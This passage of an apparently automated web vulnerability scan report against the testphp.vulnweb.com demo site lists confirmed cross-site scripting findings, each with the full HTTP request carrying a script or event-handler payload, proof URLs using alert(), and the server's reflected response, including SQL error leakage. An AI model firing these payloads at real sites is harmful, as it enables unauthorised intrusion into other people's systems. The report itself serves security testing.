POST	text	<scRipt>netsparker(0x017DCC)</scRipt>
POST	submit	add message
POST	name	anonymous user

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

text=%3cscRipt%3enetsparker(0x017DCC)%3c%2fscRipt%3e&submit=add+message&name=anonymous+user

Response

Response Time (ms) : 182.6917

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
ground-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">08.27.2021, 8:52 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;<scRipt>netsparker(0x017DCC)</scRipt></td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="test">
			<textarea name="text" rows="5" wrap="VIRTUAL"
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:30:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:04:27 AM
The Issue was detected during the Scan.	System	8/27/2021 8:52:27 AM
The Issue was detected during the Scan.	System	6/9/2021 1:25:03 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:11:24 AM

4.3. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	text
POST	submit	add message
POST	name	<scRipt>netsparker(0x018250)</scRipt>

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

text=&submit=add+message&name=%3cscRipt%3enetsparker(0x018250)%3c%2fscRipt%3e

Response

Response Time (ms) : 185.5246

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
v class="story">
	<table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong><scRipt>netsparker(0x018250)</scRipt></strong></td><td align="right" style="background-color:#F5F5F5">08.27.2021, 8:52 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="st
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:30:59 AM
The Issue was detected during the Scan.	System	8/29/2021 9:04:30 AM
The Issue was detected during the Scan.	System	8/27/2021 8:53:06 AM
The Issue was detected during the Scan.	System	6/9/2021 1:25:06 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:12:00 AM

4.4. http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x019E8E)%20x%3d%22

CONFIRMED

Method	Parameter	Value
GET	pp	x" onmouseover=netsparker(0x019E8E) x="

Proof URL

http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x019E8E)%20x%3d%22

Request Response Go to the highlighted output

Request

GET /hpp/?pp=x%22%20onmouseover%3dnetsparker(0x019E8E)%20x%3d%22 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 185.8728

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:21 GMT

<title>HTTP Parameter Pollution Example</title>

<a href="?pp=12">check</a><br/>
<a href="params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x019E8E%29+x%3D%22">link1</a><br/><a href="params.php?p=valid&pp=x" onmouseover=netsparker(0x019E8E) x="">link2</a><br/><form action="params.php?p=valid&pp=x" onmouseover=netsparker(0x019E8E) x=""><input type=submit name=aaaa/></form><br/>
<hr>
<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:32:24 AM
The Issue was detected during the Scan.	System	8/29/2021 9:09:30 AM
The Issue was detected during the Scan.	System	8/27/2021 8:56:24 AM
The Issue was detected during the Scan.	System	6/9/2021 1:28:03 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:17:07 AM

4.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x01B20B)%3c%2fscRipt%3e&pp=12

CONFIRMED

Method	Parameter	Value
GET	p	<scRipt>netsparker(0x01B20B)</scRipt>
GET	pp	12
GET	aaaa%2f

Proof URL

http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3ealert(0x01B20B)%3c%2fscRipt%3e&pp=12

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x01B20B)%3c%2fscRipt%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 185.1413

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:58:26 GMT

<scRipt>netsparker(0x01B20B)</scRipt>12

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:35:47 AM
The Issue was detected during the Scan.	System	8/29/2021 9:16:18 AM
The Issue was detected during the Scan.	System	8/27/2021 8:58:31 AM
The Issue was detected during the Scan.	System	6/9/2021 1:29:58 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:20:48 AM

4.6. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x01B4B3)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	p	valid
GET	pp	<scRipt>netsparker(0x01B4B3)</scRipt>
GET	aaaa%2f

Proof URL

http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3ealert(0x01B4B3)%3c%2fscRipt%3e

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x01B4B3)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 225.8066

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:58:32 GMT

valid<scRipt>netsparker(0x01B4B3)</scRipt>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:35:15 AM
The Issue was detected during the Scan.	System	8/29/2021 9:16:15 AM
The Issue was detected during the Scan.	System	8/27/2021 8:58:41 AM
The Issue was detected during the Scan.	System	6/9/2021 1:30:02 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:21:13 AM

4.7. http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x01A5D7)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	artist	<scRipt>netsparker(0x01A5D7)</scRipt>

Proof URL

http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3ealert(0x01A5D7)%3c%2fscRipt%3e

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=%3cscRipt%3enetsparker(0x01A5D7)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 179.7118

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x01A5D7)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:34:23 AM
The Issue was detected during the Scan.	System	8/29/2021 9:11:37 AM
The Issue was detected during the Scan.	System	8/27/2021 8:56:50 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:50 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:18:38 AM

4.8. http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x017899)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	cat	<scRipt>netsparker(0x017899)</scRipt>

Proof URL

http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3ealert(0x017899)%3c%2fscRipt%3e

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%3cscRipt%3enetsparker(0x017899)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 184.7896

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x017899)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:29:36 AM
The Issue was detected during the Scan.	System	8/29/2021 9:05:13 AM
The Issue was detected during the Scan.	System	8/27/2021 8:51:29 AM
The Issue was detected during the Scan.	System	6/9/2021 1:23:52 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:09:19 AM

4.9. http://testphp.vulnweb.com/search.php?test=query

CONFIRMED

Method	Parameter	Value
POST	test	query
POST	searchFor	<scRipt>netsparker(0x017681)</scRipt>
POST	goButton	go

Request Response Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

searchFor=%3cscRipt%3enetsparker(0x017681)%3c%2fscRipt%3e&goButton=go

Response

Response Time (ms) : 186.9749

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
ut test</a>	</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<h2 id='pageName'>searched for: <scRipt>netsparker(0x017681)</scRipt></h2></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <i
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:30:17 AM
The Issue was detected during the Scan.	System	8/29/2021 9:04:20 AM
The Issue was detected during the Scan.	System	8/27/2021 8:50:48 AM
The Issue was detected during the Scan.	System	6/9/2021 1:21:58 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:08:51 AM

4.10. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	'"--></style></scRipt><scRipt>netsparker(0x019153)</scRipt>
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname='"--></style></scRipt><scRipt>netsparker(0x019153)</scRipt>&ucc=4916613944329494&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 191.8675

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:54:38 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: '"--></style></scRipt><scRipt>netsparker(0x019153)</scRipt></li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:34:36 AM
The Issue was detected during the Scan.	System	8/29/2021 9:14:40 AM
The Issue was detected during the Scan.	System	8/27/2021 8:54:40 AM
The Issue was detected during the Scan.	System	6/9/2021 1:25:54 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:23:55 AM

4.11. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	'"--></style></scRipt><scRipt>netsparker(0x019156)</scRipt>
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc='"--></style></scRipt><scRipt>netsparker(0x019156)</scRipt>&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 192.4853

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:54:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: '"--></style></scRipt><scRipt>netsparker(0x019156)</scRipt></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:35:53 AM
The Issue was detected during the Scan.	System	8/29/2021 9:12:49 AM
The Issue was detected during the Scan.	System	8/27/2021 8:54:45 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:05 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:24:41 AM

4.12. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	'"--></style></scRipt><scRipt>netsparker(0x01937E)</scRipt>
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone='"--></style></scRipt><scRipt>netsparker(0x01937E)</scRipt>&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 197.3442

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: '"--></style></scRipt><scRipt>netsparker(0x01937E)</scRipt></li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:34:10 AM
The Issue was detected during the Scan.	System	8/29/2021 9:13:28 AM
The Issue was detected during the Scan.	System	8/27/2021 8:55:21 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:24:01 AM

4.13. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	'"--></style></scRipt><scRipt>netsparker(0x01938F)</scRipt>
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=3&uemail='"--></style></scRipt><scRipt>netsparker(0x01938F)</scRipt>&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 191.7862

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:23 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: '"--></style></scRipt><scRipt>netsparker(0x01938F)</scRipt></li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:33:54 AM
The Issue was detected during the Scan.	System	8/29/2021 9:14:03 AM
The Issue was detected during the Scan.	System	8/27/2021 8:55:26 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:09 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:25:24 AM

4.14. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass
POST	urname
POST	ucc
POST	signup	signup
POST	uphone
POST	uemail
POST	uuname	<scRipt>netsparker(0x01939B)</scRipt>
POST	upass2
POST	uaddress

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=&urname=&ucc=&signup=signup&uphone=&uemail=&uuname=%3cscRipt%3enetsparker(0x01939B)%3c%2fscRipt%3e&upass2=&uaddress=

Response

Response Time (ms) : 181.105

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: <scRipt>netsparker(0x01939B)</scRipt></li><li>Password: </li><li>Name: </li><li>Address: </li><li>E-Mail: </li><li>Phone number: </li><li>Credit card: </li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:33:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:13:24 AM
The Issue was detected during the Scan.	System	8/27/2021 8:55:29 AM
The Issue was detected during the Scan.	System	6/9/2021 1:26:26 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:23:09 AM

4.15. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	"><scRipt>netsparker(0x000009)</scRipt>

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress="><scRipt>netsparker(0x000009)</scRipt>

Response

Response Time (ms) : 181.2733

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:12 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
